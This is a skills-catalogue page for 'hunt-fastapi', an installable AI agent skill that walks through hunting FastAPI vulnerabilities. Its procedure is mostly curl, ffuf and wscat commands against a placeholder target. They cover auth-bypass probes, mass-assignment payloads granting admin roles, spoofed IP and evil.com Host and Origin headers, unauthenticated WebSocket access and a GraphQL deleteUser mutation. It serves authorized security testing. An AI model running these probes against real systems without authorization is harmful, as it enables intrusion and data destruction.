hunt-fastapi
Hunt FastAPI-specific vulnerabilities: dependency injection gaps, Pydantic coercion, and OpenAPI mining.
Install / Use
npx skills add uphiago/recon-skills --skill hunt-fastapiInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of hunt-fastapi
hunt-fastapi scores 89/100 on our quality scale, 503rd of 971 Security skills we index.
Its SKILL.md is 6.5 KB long, well organised into 34 sections with 7 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so hunt-fastapi is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
hunt-fastapi compared with similar skills
All 4 of these similar skills score higher than hunt-fastapi; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| hunt-fastapi (this skill)by uphiago | 89 | 1.3k | 29d ago | SKILL.md |
| claude-memby thedotmack | 100 | 95.0k | today | CLAUDE.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 84.8k | today | MCP Server |
Frequently asked questions
- How do I install hunt-fastapi?
- Run
npx skills add uphiago/recon-skills --skill hunt-fastapi. The install tabs above show the steps for each supported agent. - Which AI agents does hunt-fastapi work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is hunt-fastapi safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is hunt-fastapi still maintained?
- The repository was last updated 29 days ago, so hunt-fastapi is actively maintained.
Skill content
View source on GitHubname: hunt-fastapi description: "Hunt FastAPI-specific vulnerabilities: dependency injection gaps, Pydantic coercion, and OpenAPI mining." category: redteam version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, python3 tags: [redteam, fastapi, Python, ASGI, Pydantic, OpenAPI, dependency-injection] related_skills:
- hunt-sqli
- hunt-api-misconfig
- hunt-idor
- web-enumeration
FastAPI Security Hunting
Hunt FastAPI-specific vulnerabilities in dependency injection authorization gaps, Pydantic model coercion and extra field exploitation, OpenAPI schema mining for hidden endpoints, and ASGI middleware bypasses. FastAPI's design — dependency injection for auth, Pydantic for validation, OpenAPI auto-generation — creates unique attack surface distinct from Flask or Django.
When to Use
- Target uses FastAPI (indicated by
/docs,/redoc,/openapi.json, orserver: uvicorn). - OpenAPI schema is publicly accessible.
- API uses dependency injection (
Depends) for authorization. - WebSocket endpoints exist alongside REST API.
- Application uses Pydantic v1 or v2 for request validation.
Quick Detection
# FastAPI fingerprinting
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/openapi.json" | jq '.info.title' 2>/dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/docs" -w "%{http_code}\n" -o /dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/redoc" -w "%{http_code}\n" -o /dev/null
Procedure
Phase 1 — OpenAPI Schema Mining
# Download full schema for endpoint discovery
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/openapi.json" | jq '.paths | keys[]'
# Find hidden endpoints not in docs
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/openapi.json" | jq '.paths | to_entries[] | select(.value.get != null and .value.get.security == []) | .key'
# Discover internal endpoints via path parameter fuzzing
ffuf -u "https://target.com/api/FUZZ" \
-w /path/to/wordlist.txt \
-mc 200,401,403 \
-H "Accept: application/json"
Phase 2 — Dependency Injection Authorization Gaps
# Depends vs Security — check if auth is actually enforced
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/admin/users" # no auth
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/admin/users" \
-H "Authorization: Bearer INVALID_TOKEN" # invalid auth
# Dependency override in path operations
# Some endpoints may inherit Depends from router but override with None
for method in GET POST PUT PATCH DELETE; do
curl --max-time 30 --connect-timeout 10 -sk -X "$method" "https://target.com/api/users/1" \
-w "$method — %{http_code}\n" -o /dev/null
done
# Background tasks added via BackgroundTasks may skip auth
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/orders" \
-H "Content-Type: application/json" \
-d '{"user_id":"VICTIM_ID","product":"test"}'
Phase 3 — Pydantic Model Exploitation
# Type coercion — string "true" coerced to boolean
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/register" \
-H "Content-Type: application/json" \
-d '{"username":"test","is_admin":"true"}' # string coerced to bool
# Extra fields — Pydantic v1 ignores extra, v2 raises error by default
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/users" \
-H "Content-Type: application/json" \
-d '{"username":"test","role":"admin"}' # extra field may be passed to DB
# Content-type switching
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/users" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'username=test&role=admin&is_superuser=true'
Phase 4 — ASGI Middleware & Proxy Trust
# ProxyHeaders trust — if behind a proxy, spoof client IP
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/me" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "X-Real-IP: 127.0.0.1"
# TrustedHostMiddleware bypass
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/health" \
-H "Host: evil.com"
# CORS middleware — test preflight bypass
curl --max-time 30 --connect-timeout 10 -sk -X OPTIONS "https://target.com/api/users" \
-H "Origin: https://evil.com" \
-H "Access-Control-Request-Method: DELETE"
Phase 5 — WebSocket Auth Parity
# FastAPI WebSocket endpoints — auth may differ from REST
# Connect without token
wscat -c "wss://target.com/ws/notifications"
# Connect with minimal scope
wscat -c "wss://target.com/ws/admin" -H "Authorization: Bearer USER_TOKEN"
# Mounted sub-app WebSockets may skip middleware
wscat -c "wss://target.com/subapp/ws"
Phase 6 — GraphQL Mount Authorization Gaps
# GraphQL mounted via starlette-graphene or strawberry-graphql
# May not enforce Depends at GraphQL resolver level
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
# Mutations may work without auth even when queries require it
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"mutation { deleteUser(id: 1) { success } }"}'
Pitfalls
- Pydantic v2
model_configwithextra='ignore'silently drops unknown fields. Test both Pydantic v1 and v2 behavior. - OpenAPI schema may be restricted. If
/openapi.jsonreturns 403, try/docsand/redocwhich serve the same data. - FastAPI Depends with
Securityis NOT the same asDepends.Securityintegrates with OpenAPI security schemes — but both can be misconfigured. - Uvicorn
--proxy-headersmust be enabled for IP spoofing to work. Check withX-Forwarded-For— if the server sees your real IP, proxy headers are disabled.
Verification
- OpenAPI schema reveals endpoints not documented in the public API docs.
- An endpoint with
Depends(get_current_user)accepts requests without any Authorization header. - Pydantic type coercion accepts string values for boolean/integer fields and persists them.
- WebSocket endpoint accepts connections without session authentication while the REST equivalent requires it.
Related Skills
hunt-api-misconfig— Broader API configuration issues including Swagger/OpenAPI exposure.hunt-idor— Object-level authorization gaps in FastAPI path parameters.web-enumeration— Directory and endpoint discovery through OpenAPI schema mining.
Related Skills
claude-mem
95.0kPersistent Context Across Sessions for Every Agent – Captures everything your agent does during sessions, compresses it with AI, and injects relevant context back into future sessions. Works with Claude Code, OpenClaw, Codex, Gemini, Hermes, Copilot, OpenCode + More
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
84.8k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
